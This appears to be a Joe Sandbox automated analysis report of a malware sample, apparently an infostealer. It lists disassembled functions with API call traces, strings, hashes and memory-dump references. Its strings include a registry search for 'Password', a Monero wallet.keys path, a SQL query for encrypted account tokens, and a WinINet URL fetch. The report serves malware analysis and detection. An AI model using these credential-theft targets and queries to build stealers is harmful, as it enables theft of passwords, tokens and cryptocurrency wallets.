Opcode Fuzzy Hash: 4af05102c915a14d538cff872e7859591daa57f418c424bc714c9f76de1161e5
Instruction Fuzzy Hash: 5B318171D00209DFCB4AEBB4DC95DFF7779BB69301B148118F102AB294DB38A94ADB61

Function 003672D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00367314
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0036733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003673B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0036740D
GetProcessHeap.KERNEL32(00000000,?), ref: 00367452
HeapFree.KERNEL32(00000000), ref: 00367459
task.LIBCPMTD ref: 00367555

Strings

Password, xrefs: 00367401

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettask
String ID: Password
API String ID: 2808661185-3434357891
Opcode ID: ad8900bc38c22d95a7684a7265e96b464838dee0838d6e702d4d611988a3e800
Instruction ID: cddc44ff2786b10f37a7880904855c4b5ce7f7501b84b9c471b2bc0371958993
Opcode Fuzzy Hash: ad8900bc38c22d95a7684a7265e96b464838dee0838d6e702d4d611988a3e800
Instruction Fuzzy Hash: 27614AB18042689BDB25DB50CC55BDAB7BCBF48304F00C5E9E649AA145DF705BC9CFA0

Function 0036BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A920: lstrcpy.KERNEL32(00000000,?), ref: 0037A972
Part of subcall function 0037A920: lstrcat.KERNEL32(00000000), ref: 0037A982

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

Part of subcall function 0037A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0037A7E6

lstrlen.KERNEL32(00000000), ref: 0036BC9F

Part of subcall function 00378E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00378E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 0036BCCD
lstrlen.KERNEL32(00000000), ref: 0036BDA5
lstrlen.KERNEL32(00000000), ref: 0036BDB9

Strings

AccountTokens, xrefs: 0036BB49
SELECT service, encrypted_token FROM token_service, xrefs: 0036BBEB
AccountId, xrefs: 0036BCC4
AccountTokens, xrefs: 0036BABA

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: 3833f1429d9509cbc9f7816ca2c6ea2058a5a330c50186d4eaad01dca5a3897e
Instruction ID: 8ba0389d3075b4a16d5a4346a4f6577cb4e0ecf30814fa986c93ace37a25be42
Opcode Fuzzy Hash: 3833f1429d9509cbc9f7816ca2c6ea2058a5a330c50186d4eaad01dca5a3897e
Instruction Fuzzy Hash: 91B13971910608ABDB16FBA0DD56DEE777CAF94300F408158F50AAB091EF386A49DF62

Function 00364FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00364FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00364FD1
InternetOpenA.WININET(00380DDF,00000000,00000000,00000000,00000000), ref: 00364FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00365011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 00365041
InternetCloseHandle.WININET(?), ref: 003650B9
InternetCloseHandle.WININET(?), ref: 003650C6

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 86904bf28905de3907281711b43bf053c99b23a845c0d70fee7d8247a1e15a76
Instruction ID: 6fbb43681595a7837c488a0a76175d2e2931bf7977bf89ffa31a18cf5ee931f7
Opcode Fuzzy Hash: 86904bf28905de3907281711b43bf053c99b23a845c0d70fee7d8247a1e15a76
Instruction Fuzzy Hash: 3D31F5B4A40218ABDB60CF54DC85BDDB7B4EB48704F1081E9EA09A7281C7746AC9DF99

Function 00378100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0114E2D0,00000000,?,00380E2C,00000000,?,00000000), ref: 00378130
RtlAllocateHeap.NTDLL(00000000), ref: 00378137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00378158
wsprintfA.USER32 ref: 003781AC

Strings

@, xrefs: 0037814D
%d MB, xrefs: 003781A3

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2922868504-3474575989
Opcode ID: 7dac9fff656b076986582023c14d525f8014ee3ed4891a17af2ec849c6f90e5e
Instruction ID: ab96d43b18e7d802f0d6ae25681ee7f0d5e189d5077b7c3f2d7e09e7c928b6ed
Opcode Fuzzy Hash: 7dac9fff656b076986582023c14d525f8014ee3ed4891a17af2ec849c6f90e5e
Instruction Fuzzy Hash: 27214AB1E44208ABDB11DFD4CC49FAEB7B8FB44B10F108619F609BB280D77C69058BA5

Function 003783DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00378426
wsprintfA.USER32 ref: 00378459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0037847B
RegCloseKey.ADVAPI32(00000000), ref: 0037848C
RegCloseKey.ADVAPI32(00000000), ref: 00378499

Part of subcall function 0037A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0037A7E6

RegQueryValueExA.KERNEL32(00000000,0114E240,00000000,000F003F,?,00000400), ref: 003784EC
lstrlen.KERNEL32(?), ref: 00378501
RegQueryValueExA.KERNEL32(00000000,0114E390,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00380B34), ref: 00378599
RegCloseKey.KERNEL32(00000000), ref: 00378608
RegCloseKey.ADVAPI32(00000000), ref: 0037861A

Strings

%s\%s, xrefs: 0037844D

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 00938bad9eb22461c2e2f40af92389eafa32bc0f5379a63f079a2a5d518052d1
Instruction ID: da3db9ce2c40c1c95bfb88bfd0045afdab084f9f88f0dc5dac29e7283f1da5ab
Opcode Fuzzy Hash: 00938bad9eb22461c2e2f40af92389eafa32bc0f5379a63f079a2a5d518052d1
Instruction Fuzzy Hash: FC21E97195021CABDB64DB54DC85FE9B7B8FB48700F00C5D8E609A6140DF75AA85CFD4

Function 00377690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 003776A4
RtlAllocateHeap.NTDLL(00000000), ref: 003776AB
RegOpenKeyExA.KERNEL32(80000002,0113C438,00000000,00020119,00000000), ref: 003776DD
RegQueryValueExA.KERNEL32(00000000,0114E270,00000000,00000000,?,000000FF), ref: 003776FE
RegCloseKey.ADVAPI32(00000000), ref: 00377708

Strings

Windows 11, xrefs: 003776BD

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 4918f2d92e7e4ffa7e87e53f1589bb80960ea00bd1b0740b32e80371bfaff54c
Instruction ID: d1b56cde13af4ae0c79c2a0e396523df4d2ca5a9dd77337ea91f48c6ff9f0989
Opcode Fuzzy Hash: 4918f2d92e7e4ffa7e87e53f1589bb80960ea00bd1b0740b32e80371bfaff54c
Instruction Fuzzy Hash: 2B018FB4A00209BBEB11DBE4DC49F7AB7B8EB48701F008454FA0497290E7789908DB51

Function 00377720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00377734
RtlAllocateHeap.NTDLL(00000000), ref: 0037773B
RegOpenKeyExA.KERNEL32(80000002,0113C438,00000000,00020119,003776B9), ref: 0037775B
RegQueryValueExA.KERNEL32(003776B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0037777A
RegCloseKey.ADVAPI32(003776B9), ref: 00377784

Strings

CurrentBuildNumber, xrefs: 00377771

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: 15a428725fdb290f2bddef285e85121ff86c0c4e68bb504e6e1d6e2866cd5e94
Instruction ID: 8e327e3431f86a389c950b68b1e5b97714fa5b0903ca11e03dd87bcdf08c2f5d
Opcode Fuzzy Hash: 15a428725fdb290f2bddef285e85121ff86c0c4e68bb504e6e1d6e2866cd5e94
Instruction Fuzzy Hash: 0F014FB5A40309BBEB10DBE0DC4AFBEB7B8EB58701F104559FA05A7281DB745A04DB51

Function 003740B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 003740D5
RegOpenKeyExA.KERNEL32(80000001,0114D840,00000000,00020119,?), ref: 003740F4
RegQueryValueExA.ADVAPI32(?,0114E438,00000000,00000000,00000000,000000FF), ref: 00374118
RegCloseKey.ADVAPI32(?), ref: 00374122
lstrcat.KERNEL32(?,00000000), ref: 00374147
